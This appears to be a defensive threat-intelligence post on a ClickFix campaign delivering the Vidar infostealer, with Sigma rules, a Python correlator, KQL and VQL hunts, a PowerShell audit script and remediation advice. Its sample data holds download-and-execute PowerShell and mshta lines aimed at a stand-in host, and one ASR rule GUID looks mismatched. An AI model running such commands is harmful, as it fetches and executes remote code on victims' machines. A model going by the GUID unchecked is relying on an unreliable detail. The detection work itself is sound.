The Australian Cyber Security Centre (ACSC) has issued a critical alert regarding an active campaign employing "ClickFix" techniques to deliver the Vidar information stealer. Unlike traditional phishing relying on malicious attachments, ClickFix bypasses many email gateway defenses by weaponizing the user's browser. Victims are lured—often via SEO poisoning—to fake websites displaying fraudulent error messages or CAPTCHAs. Under the guise of "verifying humanity" or fixing a browser issue, users are socially engineered into copying and executing arbitrary PowerShell commands. This results in the immediate download and execution of the Vidar infostealer. For defenders, this represents a significant gap in traditional perimeter controls, as the initial "payload" is a user-initiated, trusted shell command.
Technical Analysis
Threat Vector: Social Engineering / ClickFix (Browser-based Fake Technical Support).
Malware Payload: Vidar Infostealer. This modular malware targets sensitive data including browser cookies, history, saved passwords, cryptocurrency wallets, and 2FA credentials. It often serves as a loader for secondary payloads like ransomware (e.g., Stop/Djvu).
Attack Chain Breakdown:
- Initial Access: User navigates to a compromised or malicious website (often delivered via SEO poisoning).
- Social Engineering: A fake overlay (fake browser update, CAPTCHA, or error) instructs the user to open "Run" (WIN+R) or PowerShell.
- Execution: The user pastes a command provided by the site. This command is typically a PowerShell one-liner utilizing Invoke-Expression (IEX) or Invoke-WebRequest to fetch a second-stage script or binary.
- Persistence: Vidar often establishes persistence via scheduled tasks or registry run keys.
- Exfiltration: Stolen data is sent to the threat actor's C2 server via HTTP/HTTPS.
Exploitation Status: Confirmed Active Exploitation. The ACSC has identified this campaign targeting Australian organizations, though the nature of web-based delivery makes it a global threat.
Detection & Response
This threat relies on a behavioral anomaly: a user manually executing a complex shell command provided by a web browser. We detect this by looking for the unusual parent-child process relationships and the specific command-line syntax associated with ClickFix (PowerShell spawning MSHTA or making web requests).
```yaml
title: Potential ClickFix Activity - Browser Spawning PowerShell
id: 8a1b2c3d-4e5f-6789-0abc-1d2e3f4a5b6c
status: experimental
description: Detects potential ClickFix social engineering where a browser process spawns PowerShell. This is highly suspicious as browsers do not typically launch shell environments.
references:
  - https://www.cyber.gov.au/acsc/view-all-content/alerts/clickfix
tags:
  - attack.initial_access
  - attack.t1566.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
falsepositives:
  - Legitimate administrative web tools launching local scripts (rare)
level: high
```

```yaml
title: ClickFix Payload Delivery - PowerShell Spawning MSHTA with URL
id: 9b2c3d4e-5f6a-7890-1bcd-2e3f4a5b6c7d
status: experimental
description: Detects the classic ClickFix payload delivery where PowerShell launches mshta.exe with a remote URL argument, indicative of fetching a malicious HTML Application (HTA).
references:
  - https://attack.mitre.org/techniques/T1059/001
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'http'
  condition: selection
falsepositives:
  - Legacy internal enterprise applications launching help files
level: critical
```

```yaml
title: Vidar Stealer Behavior - PowerShell DownloadString
id: 0c3d4e5f-6a7b-8901-2cde-3f4a5b6c7d8e
status: experimental
description: Detects PowerShell commands characteristic of ClickFix droppers, specifically combining 'DownloadString' with obfuscation techniques or direct execution.
references:
  - https://www.infosecurity-magazine.com/news/australian-cyber-security-centre/
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX '
      - 'Invoke-Expression'
  filter_legit_admin:
    CommandLine|contains:
      - 'System.Management.Automation'
  condition: selection and not filter_legit_admin
falsepositives:
  - Administrators running remote scripts manually
level: medium
```
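The three Sigma rules above each fire on one link of the chain; in practice a SOC wants the links stitched together so a browser-spawned shell, its download-and-execute command line and the mshta child arrive as one finding. The Python below is an added example (not part of the ACSC alert or this page's own rules) that applies the same three checks to process-creation records and correlates the hits by parent/child PID back to the browser ancestor. The `ProcEvent` type, the `classify`, `find_clickfix_chains` and `severity` helpers, the `PLACEHOLDER.invalid` host and every record in `SAMPLE_EVENTS` are constructed for the example and are not from the page.

```python
"""Correlate process-creation events into ClickFix chains.

Added example, not the ACSC alert's or this page's own tooling: it applies the
three checks the Sigma rules above express (browser -> shell, shell -> mshta
with a URL, PowerShell running DownloadString/IEX minus the page's admin
filter) to process-creation records and links the hits by parent/child PID,
so one finding covers the whole chain instead of three unrelated alerts.
SAMPLE_EVENTS below is constructed sample data, not real telemetry.
"""
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_EXEC = re.compile(r"DownloadString|\bIEX\b|Invoke-Expression", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcEvent:
    """One process-creation record (the fields Sysmon EID 1 / Security 4688 carry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Indicator labels for one event; each mirrors one Sigma selection above."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    labels = []
    if parent in BROWSERS and image in SHELLS:
        labels.append("browser_spawned_shell")
    if parent in SHELLS and image == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        labels.append("mshta_remote_url")
    if (image in POWERSHELL and DOWNLOAD_EXEC.search(ev.cmdline)
            and "System.Management.Automation" not in ev.cmdline):
        labels.append("powershell_download_exec")
    return labels


def find_clickfix_chains(events: list) -> dict:
    """Group flagged events under their browser ancestor, keyed by the browser PID."""
    by_pid = {e.pid: e for e in events}
    chains = {}
    for ev in events:
        labels = classify(ev)
        if not labels:
            continue
        # Walk parent links until a browser is reached or no record is left.
        root = ev
        while basename(root.image) not in BROWSERS and root.ppid in by_pid:
            root = by_pid[root.ppid]
        if basename(root.image) in BROWSERS:
            key, root_name = root.pid, basename(root.image)
        else:  # browser record missing: key on the topmost known parent PID
            key, root_name = root.ppid, basename(root.parent_image)
        chain = chains.setdefault(key, {"root": root_name, "pids": [], "indicators": set()})
        chain["pids"].append(ev.pid)
        chain["indicators"].update(labels)
    return chains


def severity(indicators: set) -> str:
    """Map a chain's combined indicators onto the Sigma levels used above."""
    if "mshta_remote_url" in indicators or (
            "browser_spawned_shell" in indicators and "powershell_download_exec" in indicators):
        return "critical"
    if "browser_spawned_shell" in indicators:
        return "high"
    return "medium"


# Constructed sample data: one ClickFix-style chain plus one benign admin script.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, CHROME, "chrome.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(200, 100, PS, "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://PLACEHOLDER.invalid/a')\"", CHROME),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta http://PLACEHOLDER.invalid/b", PS),
    ProcEvent(400, 50, PS, r"powershell -NoProfile -File C:\Scripts\inventory.ps1",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for key, chain in find_clickfix_chains(SAMPLE_EVENTS).items():
        print(f"root pid {key} ({chain['root']}): pids {sorted(chain['pids'])}, "
              f"{sorted(chain['indicators'])} -> {severity(chain['indicators'])}")
```

Run as-is it reports a single chain rooted at the chrome.exe record, carrying all three indicators, at severity critical; the legitimate `-File` invocation from explorer.exe produces nothing. In production the records would come from a Sysmon EID 1 or Security 4688 export, and the walk-up-to-the-browser step is what turns three independent Sigma hits into one triage item.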
**KQL (Microsoft Sentinel / Defender)**
Hunt for the specific process tree indicative of ClickFix attacks.
```kql
// Hunt for ClickFix: Browser -> PowerShell/CMD, and PowerShell/CMD -> MSHTA with a URL.
// The second clause is needed because mshta.exe is a child of the shell, not of the browser,
// so a browser-parent filter alone would never surface it. case() replaces the original
// multi-branch iff(), which only accepts a single condition.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (InitiatingProcessFileName in~ ('chrome.exe', 'msedge.exe', 'firefox.exe')
         and FileName in~ ('powershell.exe', 'pwsh.exe', 'cmd.exe'))
    or (InitiatingProcessFileName in~ ('powershell.exe', 'pwsh.exe', 'cmd.exe')
         and FileName =~ 'mshta.exe' and ProcessCommandLine contains 'http')
| extend ClickFixIndicator = case(
    FileName in~ ('powershell.exe', 'pwsh.exe') and (ProcessCommandLine contains 'DownloadString' or ProcessCommandLine contains 'IEX'), 'Suspicious PS Command',
    FileName =~ 'mshta.exe' and ProcessCommandLine contains 'http', 'Suspicious MSHTA Execution',
    'Suspicious Parent Process')
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath, ClickFixIndicator
| order by Timestamp desc
```
**Velociraptor VQL**
Hunt endpoint for process creation chains matching the ClickFix profile (Browser spawning PowerShell).
```vql
-- Hunt for Browser Spawning PowerShell or CMD.
-- pslist() is a live snapshot of running processes, so this finds chains that are
-- still alive; for historical chains query Sysmon EID 1 or Security 4688 instead.
-- The original mixed OR and AND without parentheses (AND binds tighter), so the
-- parent and child conditions are expressed as anchored, case-insensitive regexes.
LET browsers = SELECT Pid AS BrowserPid, Name AS BrowserName
  FROM pslist()
  WHERE Name =~ "(?i)^(chrome|msedge|firefox)\\.exe$"

SELECT * FROM foreach(
  row=browsers,
  query={
    SELECT Pid, Ppid, Name, CommandLine, Exe, Username, CreateTime,
           BrowserName AS ParentName
    FROM pslist()
    WHERE Ppid = BrowserPid
      AND Name =~ "(?i)^(powershell|pwsh|cmd)\\.exe$"
  })
```
**Remediation Script (PowerShell)**
This script performs two actions: it verifies if PowerShell Script Block Logging is enabled (critical for detecting these attacks) and hunts the event logs for recent "ClickFix" patterns to identify compromised hosts.
```powershell
# Ensure PowerShell Script Block Logging is enabled for detection.
# Writing under HKLM:\Software\Policies requires an elevated (Administrator) session.
$registryPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$name = 'EnableScriptBlockLogging'
$value = 1
if (-not (Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    Write-Host "[+] Created ScriptBlock Logging registry path."
} else {
    Write-Host "[*] ScriptBlock Logging registry path exists."
}
$currentValue = (Get-ItemProperty -Path $registryPath -Name $name -ErrorAction SilentlyContinue).$name
if ($currentValue -ne $value) {
    Set-ItemProperty -Path $registryPath -Name $name -Value $value -Type DWord
    Write-Host "[+] Enabled ScriptBlock Logging."
} else {
    Write-Host "[+] ScriptBlock Logging is already enabled."
}

# Hunt the Security event log for ClickFix process chains (Event ID 4688).
# The rendered 4688 message labels the fields 'New Process Name:' and
# 'Creator Process Name:' (the latter is present on Windows 10 / Server 2016 and later),
# so the regexes match those labels rather than the internal field names. In a
# single-quoted PowerShell string '\\' reaches the regex engine as one literal
# backslash, i.e. the path separator just before the executable name.
Write-Host "[*] Hunting for ClickFix indicators in Security Log (Last 24h)..."
$events = Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; StartTime=(Get-Date).AddHours(-24)} -ErrorAction SilentlyContinue
if ($events) {
    $clickFixHits = $events | Where-Object {
        $_.Message -match 'Creator Process Name:.*\\(chrome|msedge|firefox)\.exe' -and
        $_.Message -match 'New Process Name:.*\\(powershell|pwsh|cmd)\.exe'
    }
    if ($clickFixHits) {
        Write-Host "[!] ALERT: Potential ClickFix activity detected!" -ForegroundColor Red
        $clickFixHits | Format-List TimeCreated, Message
    } else {
        Write-Host "[+] No immediate ClickFix process chains found in last 24h."
    }
} else {
    # 4688 is only written when 'Audit Process Creation' is enabled. Hosts that rely on
    # Sysmon instead log process creation as Event ID 1 in Microsoft-Windows-Sysmon/Operational.
    Write-Host "[-] No 4688 events found (Audit Process Creation is off, or process telemetry is in Sysmon)."
}
```
Remediation
1. Immediate User Awareness: Issue a security advisory to all staff immediately. Warn them specifically against copying and pasting commands from browser error messages or "verification" pop-ups into PowerShell or the Run dialog. The browser will NEVER ask a user to execute a shell command to fix a display issue.
2. Enable Attack Surface Reduction (ASR) Rules:
- Rule ID: "Block JavaScript or VBScript from launching downloaded executable content" (GUID: D3E037E1-3EB8-44C8-A917-57927947596D).
- Rule ID: "Block Office applications from creating child processes" (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25). While this is primarily Office, it helps if the lure is a document.
- Action: Configure these rules in "Audit" mode first to gauge noise, then move to "Block".
3. Harden PowerShell Execution Policy: While not a silver bullet, ensuring Restricted or RemoteSigned mode prevents ad-hoc script execution if the attacker attempts to save a .ps1 file. Ensure ScriptBlockLogging and ModuleLogging are enforced via Group Policy.
4. Web Filtering: Implement URL filtering blocks against categories known to host fraudulent tech support pages (e.g., "Phishing," "Newly Registered Domains") if feasible.
5. Incident Response: If the detection rules trigger, treat the host as compromised. Isolate the machine, capture a memory image, and scour for persistence mechanisms (Startup folders, Scheduled Tasks) used by Vidar. Revoke all credentials saved in browsers on the affected machine.